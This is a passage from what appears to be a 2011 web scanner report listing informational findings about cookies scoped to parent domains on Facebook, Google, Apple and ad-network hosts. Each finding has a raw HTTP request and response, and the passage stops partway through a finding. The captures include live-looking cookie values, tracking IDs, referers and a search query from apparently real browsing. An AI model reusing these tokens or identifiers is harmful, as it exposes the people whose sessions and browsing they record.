datr=iYHCTdc7DK0nHY1ABdOZIOOt; expires=Sat, 04-May-2013 10:52:57 GMT; path=/; domain=.facebook.com; httponly
lsd=lJrnB; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=iYHCTdc7DK0nHY1ABdOZIOOt; expires=Sat, 04-May-2013 10:52:57 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=lJrnB; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.233.116
Connection: close
Date: Thu, 05 May 2011 10:52:57 GMT
Content-Length: 14534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

16.63. http://developers.facebook.com/plugins/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/plugins/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsd=iYuAk; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fdevelopers.facebook.com%2Fplugins%2F; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fdevelopers.facebook.com%2Fplugins%2F; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /plugins/ HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: /docs/plugins
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=iYuAk; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fdevelopers.facebook.com%2Fplugins%2F; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fdevelopers.facebook.com%2Fplugins%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.37.16.114
Connection: close
Date: Thu, 05 May 2011 10:52:56 GMT
Content-Length: 0

16.64. http://feedburner.google.com/fb/a/mailverify previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://feedburner.google.com
Path:	/fb/a/mailverify

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

S=feedburner-control-panel=QCfNUmJbZJu2SDH5i0eLiw; Domain=.google.com; Path=/; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fb/a/mailverify HTTP/1.1
Host: feedburner.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.65. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

test_cookie=CheckForPermission; expires=Thu, 05-May-2011 11:08:03 GMT; path=/; domain=.doubleclick.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /activityi HTTP/1.1
Host: fls.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Set-Cookie: test_cookie=CheckForPermission; expires=Thu, 05-May-2011 11:08:03 GMT; path=/; domain=.doubleclick.net
Location: /activityi?&_dc_ck=try
Date: Thu, 05 May 2011 10:53:03 GMT
Content-Type: text/html; charset=UTF-8
Server: Floodlight server
Content-Length: 223
X-XSS-Protection: 1; mode=block
Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="/activityi?&_dc_ck=try">here
...[SNIP]...

16.66. http://fusion.google.com/add previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fusion.google.com
Path:	/add

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=5dcdac76151b5a82:TM=1304592784:LM=1304592784:S=fQ1PrRcqpq9zNDdI; expires=Sat, 04-May-2013 10:53:04 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /add HTTP/1.1
Host: fusion.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Location: http://www.google.com/ig/add
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=5dcdac76151b5a82:TM=1304592784:LM=1304592784:S=fQ1PrRcqpq9zNDdI; expires=Sat, 04-May-2013 10:53:04 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Thu, 05 May 2011 10:53:04 GMT
Server: igfe
Content-Length: 225
X-XSS-Protection: 1; mode=block
Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.google.com/ig/add">he
...[SNIP]...

16.67. http://googleads.g.doubleclick.net/aclk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/aclk

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

test_cookie=CheckForPermission; expires=Thu, 05-May-2011 11:08:05 GMT; path=/; domain=.doubleclick.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aclk HTTP/1.1
Host: googleads.g.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=CheckForPermission; expires=Thu, 05-May-2011 11:08:05 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Date: Thu, 05 May 2011 10:53:05 GMT
Server: AdClickServer
Content-Length: 0
X-XSS-Protection: 1; mode=block
Connection: close

16.68. http://graph.facebook.com/10134017/picture previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://graph.facebook.com
Path:	/10134017/picture

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

datr=kYHCTZUXfL6UkV912axfpXJ9; expires=Sat, 04-May-2013 10:53:05 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /10134017/picture HTTP/1.1
Host: graph.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: image/jpeg
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://profile.ak.fbcdn.net/hprofile-ak-snc4/49703_10134017_5151_q.jpg
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-FB-Rev: 374220
Set-Cookie: datr=kYHCTZUXfL6UkV912axfpXJ9; expires=Sat, 04-May-2013 10:53:05 GMT; path=/; domain=.facebook.com; httponly
X-FB-Server: 10.36.2.106
Connection: close
Date: Thu, 05 May 2011 10:53:05 GMT
Content-Length: 0

16.69. http://groups.google.com/grphp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://groups.google.com
Path:	/grphp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=1251087ecc6a48b8:TM=1304592786:LM=1304592786:S=3Og75Dhdbvu6iji7; expires=Sat, 04-May-2013 10:53:06 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /grphp HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=1251087ecc6a48b8:TM=1304592786:LM=1304592786:S=3Og75Dhdbvu6iji7; expires=Sat, 04-May-2013 10:53:06 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Thu, 05 May 2011 10:53:06 GMT
Server: GWS-GRFE/0.50
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

16.70. http://ib.adnxs.com/getuid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=2724386019227846218; path=/; expires=Wed, 03-Aug-2011 10:53:08 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anj=Kfu=8fG7vhgj[2<?0P(*AuB-u**g1:XIEGDEhzW()U9M1kUGf3$2.f0R>9.acl`F4%p2Nl.UXEE*e?s.KZk)1P8:JhD>3]0OXTvN!yxE%+(uoie>W`_v8QfQ%yo5xj:Z3>gd/L60<:0H$58xf@TP8EN^Aa7.qES'cu)ziVp`aanbh'IXK_')9#*'OqB0__+7d).vaGpBe9>V?b=^3-#H@!=%>IE/HM`)s3*[`hUEAwY-atIxWZl9RF$+OaI:l_Qcc9wmRBbW$qm9'55djeSa8ZQ96*Jp)C^/<CN-yHf5FURTYHOv]@%<7Aq6u^k]-O]7X=2zKSL4quR8kO_D>X[HvK1.Z8LyTgPDtFmwP=9UjfKherrC(!HN)-rs$$.Z4RwKgg$hjvE=h]Y3^aGI31FC_+(AsbutS4%o=cG=F6ppp35v0Hp53EQnWXio#:w1_scIl_O(gee'(4OTfW/q:Rz1+w6b.Vi<p.T*C2GR6e]tqP0@3dSr9ox*G.!htZ]Mz+FTi@UGkKz@XApYJmq$=Vw>B=cnuV1(XHu?f9kld6tUGu]mWIwdMo@:9[ns]Nq8sV$[>K:4>wF](16qdoZ$6'I1F:`tO4!]q; icu=ChII-sEBEAoYCiAKKAowg_iG7gQQg_iG7gQYCQ..; uuid2=2724386019227846218; sess=1;

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 06-May-2011 10:53:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 03-Aug-2011 10:53:08 GMT; domain=.adnxs.com; HttpOnly
Location: .r..
Date: Thu, 05 May 2011 10:53:08 GMT
Content-Length: 0
Connection: close

16.71. http://ib.adnxs.com/seg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=2724386019227846218; path=/; expires=Wed, 03-Aug-2011 01:41:26 GMT; domain=.adnxs.com; HttpOnly
uuid2=2724386019227846218; path=/; expires=Wed, 03-Aug-2011 01:41:26 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7vhgj[2<?0P(*AuB-u**g1:XIEGDEhzW()U9M1kUGf3$2.f0R>9.acl`F4%p2Nl.UXEE*e9QAKZcy$'4zkTds`G>$Y2_x#xl](4L*gWQ!82Bsq+?%*xcHu[9c=WUo?_H=omCl'GEsQ[iaDe#'0CL9KAs*NVQnV5j2JGe0swn8Zaw0O$2+zjGg9A4LL08uJXhaPreyXK>i@7$l[!U)We]9m<`:lBnx?T21cb77Gmou6^jD(gcglEnRT=%NN4q`+Hi!%kFnwGHiuX+I5YoNIO5k0c[MSbx7njQGi0)-:TDf>[)JB]jN^AZA:`:L7xFdq.[obo+6+xCdX6<ltYh08Mux1S'0z]_vHY>/[t(FMmmF*#lx04hmgH0:F)jjQU-9VrfVL56DAFjnC[+iB4JzuIs9/2)f>jZThg)leCe+@mgjPZ%dW:Bb$Rj9Bo27TC#RW=N*iwo-SVIWP.#z/sJdL2VU(L03b#EtIR%6X!=wVP+l85o2j8#Rl>$Iv5i.MV/kZjpZ8G74qc2+D1uzmGIeWZ</89#NPP@BCHq3Xs?bW#eKx%nQO@J>7xjRP*'?@DNFXWD.-?fzPd<KUtm?hRHnG2[)S; path=/; expires=Wed, 03-Aug-2011 01:41:26 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add_code=impx-11265&member=30 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=558358678
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=ChII-sEBEAoYCiAKKAowg_iG7gQQg_iG7gQYCQ..; uuid2=2724386019227846218; anj=Kfu=8fG3H<gj[2<?0P(*AuB-u**g1:XIC/YEhzW()U9M1kUGf3$2.f0R>9.acl`F4%p2Nl.USAA5%p=ns=x+Fe(?TVP/3EvwIwXVG/C'4kuR0A+-n_?4c-mu!]%BWXd`?@tfAa<+!_/VspH.U'0z[`+B!NHr_LqEQC4x@)Wh.XhAYMSiB>b:H_Ow0gYes6GHi7EI3eK]3R@Nl5CoFO45k[tKrMi>.Xt]9[@n31$+nwyPZ7U=W>LHM3T4M#^Q3pkmWg+3nH/]xnzHZ=N!I$Hx4)P'kV3)6R-eMV?4^a>]$!X9^RDTuLu`Gg9=dIc4+hibOXVH]p[b-Lx59F*+>q<CtTaN9@TN[vcG0(%aAJ6ScVP9Rgm4M%1YSthSq=>Jd^iV`cWHV`F6?xon6Z1/S]G>.Wu?NMcN*Y`V#)%)OV_QG()XRaedXxb$efFw3t8l7.U##!8D4?lqLt?01nF6CJf8gn+.75!Vt'v4`4hVA[Pc!]W'fkGXx@#:^z*`9N.gOhM'TW?sFcTmQscP<M2bs#'%dOligD[XKrGEswk(rz[pWLu[iDz*Y[Zrh8s526Zn5(MSVle^Zq<pbIVZk8

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 06-May-2011 01:41:26 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 03-Aug-2011 01:41:26 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 03-Aug-2011 01:41:26 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhgj[2<?0P(*AuB-u**g1:XIEGDEhzW()U9M1kUGf3$2.f0R>9.acl`F4%p2Nl.UXEE*e9QAKZcy$'4zkTds`G>$Y2_x#xl](4L*gWQ!82Bsq+?%*xcHu[9c=WUo?_H=omCl'GEsQ[iaDe#'0CL9KAs*NVQnV5j2JGe0swn8Zaw0O$2+zjGg9A4LL08uJXhaPreyXK>i@7$l[!U)We]9m<`:lBnx?T21cb77Gmou6^jD(gcglEnRT=%NN4q`+Hi!%kFnwGHiuX+I5YoNIO5k0c[MSbx7njQGi0)-:TDf>[)JB]jN^AZA:`:L7xFdq.[obo+6+xCdX6<ltYh08Mux1S'0z]_vHY>/[t(FMmmF*#lx04hmgH0:F)jjQU-9VrfVL56DAFjnC[+iB4JzuIs9/2)f>jZThg)leCe+@mgjPZ%dW:Bb$Rj9Bo27TC#RW=N*iwo-SVIWP.#z/sJdL2VU(L03b#EtIR%6X!=wVP+l85o2j8#Rl>$Iv5i.MV/kZjpZ8G74qc2+D1uzmGIeWZ</89#NPP@BCHq3Xs?bW#eKx%nQO@J>7xjRP*'?@DNFXWD.-?fzPd<KUtm?hRHnG2[)S; path=/; expires=Wed, 03-Aug-2011 01:41:26 GMT; domain=.adnxs.com; HttpOnly
Location: http://cm.g.doubleclick.net/pixel?nid=appnexus1
Date: Thu, 05 May 2011 01:41:26 GMT
Content-Length: 0

16.72. http://id.google.com/verify/EAAAAC-C2hTTg1_wpgNVul6NqWU.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAAC-C2hTTg1_wpgNVul6NqWU.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SNID=46=UrwH2RxwC7ZsSJyWfFlrI-jbKn3sUG0hNYbD9nXZ_w=SV6Ehvzqcn14QUEO; expires=Fri, 04-Nov-2011 02:45:54 GMT; path=/verify; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAC-C2hTTg1_wpgNVul6NqWU.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Bucky+A+Jordan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=46=r0Yu_Pti74HDNSkQe8JACIqi4Uotl4cbu9_A2Tb8wQ=8Xt3Q4d7RugZsGwF; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=Ba0U4da8P8fQA7x45DtUHYILglZeYGIGups8rg_DvVz_eZJte3UjlHF5LBgdHRELPDWgg_M2c4cfEuCb_MKRBOuEFsxKD3DPCgbNnbLWJ4NjJXl0O-Jy3456noCUlqNv

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=46=UrwH2RxwC7ZsSJyWfFlrI-jbKn3sUG0hNYbD9nXZ_w=SV6Ehvzqcn14QUEO; expires=Fri, 04-Nov-2011 02:45:54 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Thu, 05 May 2011 02:45:54 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

16.73. http://idcs.interclick.com/Segment.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idcs.interclick.com
Path:	/Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256&10677=734260; domain=.interclick.com; expires=Wed, 05-May-2021 01:02:51 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=697a8088-0d41-4f72-9fb6-5bc7ecc099e8 HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1303847484419&e50=1305834684416&e100=1303847484462; sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256&10677=734260; domain=.interclick.com; expires=Wed, 05-May-2021 01:02:51 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Thu, 05 May 2011 01:02:50 GMT

GIF89a.............!.......,...........D..;

16.74. http://image3.pubmatic.com/AdServer/UPug previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image3.pubmatic.com
Path:	/AdServer/UPug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

KADUSERCOOKIE=AF9BE934-13F3-41C9-ACC3-875388B259BA; domain=pubmatic.com; expires=Fri, 04-May-2012 00:59:26 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/UPug?operId=2&pubId=19677&pixId=16&ran=0.8117935182526708&pageURL=http://www.huffingtonpost.com/ HTTP/1.1
Host: image3.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; KRTBCOOKIE_53=424-c1e1301e-3a1f-4ca7-9870-f636b5f10e66; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104.1359_1306933483.1555_1398966889

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:26 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KADUSERCOOKIE=AF9BE934-13F3-41C9-ACC3-875388B259BA; domain=pubmatic.com; expires=Fri, 04-May-2012 00:59:26 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Connection: close
Content-Type: text/html
Content-Length: 484

document.write('<script type="text/javascript" src="http://ads.pubmatic.com/UniversalPixel/19677/16/pixel.js"></script>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="tru
...[SNIP]...

16.75. http://images.apple.com/global/nav/styles/navigation.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/nav/styles/navigation.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=B5ebQMrboP/GSTm8I+6Sg1qQULUt3cGrRwZyioHji6hbHFZ2wRYZ4hnLCzAmoaD1jiO8RqoLIhT9+xUZPzXnAdntHreObH6THD4IhsBMGdYx8KVcAZcNFgCOUqj115aVGadV85bVoFGsDegaFsOjy3wsZurD89dX1RTm+OGdPQXwdO6Mo/53N2M6/xN6zsXAOPmNWeI6RT77VPGQDAFPK503AxWpiaMY6zKRg1tdJlwQUHU/9lKIqyiSPDuTDj9yV/0D6lo7B/Nkm0eoIaudf67q9FV6261SddPmqBY3uh7GpUWWHIxJMVXb/N/JrMrq5F67PgazCkgcOfBX2Wzz8UIgVnrBKihd3Khc1VbEtAew2e7TfKMB1xRi6o3YCAJzcOGlc1uyCewBfqH7Ar4AoWyAsJMyzq65jVZnLJQbxDVZ8doj45HN6BYAPR8CJXFPgvognk4DEuRv1EW93WL0lwBFCxK+lfzV/buf6UTDZwWFR9AQf2cq8+/mnlfFH7Aeo18W8lX0qpPAat0BiPGGIzIJ/HfslVi2qu1udIfVUMs0lTTNNQoTQ7ICrm3kL1cW; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/nav/styles/navigation.css HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/engadget/id347839246?mt=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D7B9FD85162B9C-600001848003F046[CE]; POD=us~en; s_vnum_us=ch%3Ditunes%26vn%3D1%3Bch%3Dsupport%26vn%3D1%3B; ac_survey=1

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 20 Apr 2011 16:46:06 GMT
ETag: "290c-4a15c5c648f80"
Vary: Accept-Encoding
Server: Apache/2.2.14 (Unix)
Cteonnt-Length: 10508
Content-Type: text/css
Cache-Control: max-age=521
Expires: Thu, 05 May 2011 12:52:02 GMT
Date: Thu, 05 May 2011 12:43:21 GMT
Connection: close
Set-Cookie: ccl=B5ebQMrboP/GSTm8I+6Sg1qQULUt3cGrRwZyioHji6hbHFZ2wRYZ4hnLCzAmoaD1jiO8RqoLIhT9+xUZPzXnAdntHreObH6THD4IhsBMGdYx8KVcAZcNFgCOUqj115aVGadV85bVoFGsDegaFsOjy3wsZurD89dX1RTm+OGdPQXwdO6Mo/53N2M6/xN6zsXAOPmNWeI6RT77VPGQDAFPK503AxWpiaMY6zKRg1tdJlwQUHU/9lKIqyiSPDuTDj9yV/0D6lo7B/Nkm0eoIaudf67q9FV6261SddPmqBY3uh7GpUWWHIxJMVXb/N/JrMrq5F67PgazCkgcOfBX2Wzz8UIgVnrBKihd3Khc1VbEtAew2e7TfKMB1xRi6o3YCAJzcOGlc1uyCewBfqH7Ar4AoWyAsJMyzq65jVZnLJQbxDVZ8doj45HN6BYAPR8CJXFPgvognk4DEuRv1EW93WL0lwBFCxK+lfzV/buf6UTDZwWFR9AQf2cq8+/mnlfFH7Aeo18W8lX0qpPAat0BiPGGIzIJ/HfslVi2qu1udIfVUMs0lTTNNQoTQ7ICrm3kL1cW; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com
Content-Length: 10508

/* GLOBALHEADER */
#globalheader { position:relative; display:block; width:980px; height:36px; margin:18px auto; text-align:left; z-index:9998; background:url(/global/nav/images/globalheader.png) repe
...[SNIP]...

16.76. http://leadback.advertising.com/adcedge/lb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leadback.advertising.com
Path:	/adcedge/lb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=4WfwN5pqEIxFGJpovUg3sY0NSKMCItdhWhQ3WXoVIoLOGaFCKGehWhQ3gZoVIMa4FaFCEGehWhAmoZoVIwtlGaFCA9qhWhw2kXoVIsijGaFCGenhWhQQvaoVI0kmGaFC3mphWVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaoBxOSBsRphj1I9HsfzF68i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAH; domain=advertising.com; expires=Sat, 04-May-2013 00:56:24 GMT; path=/
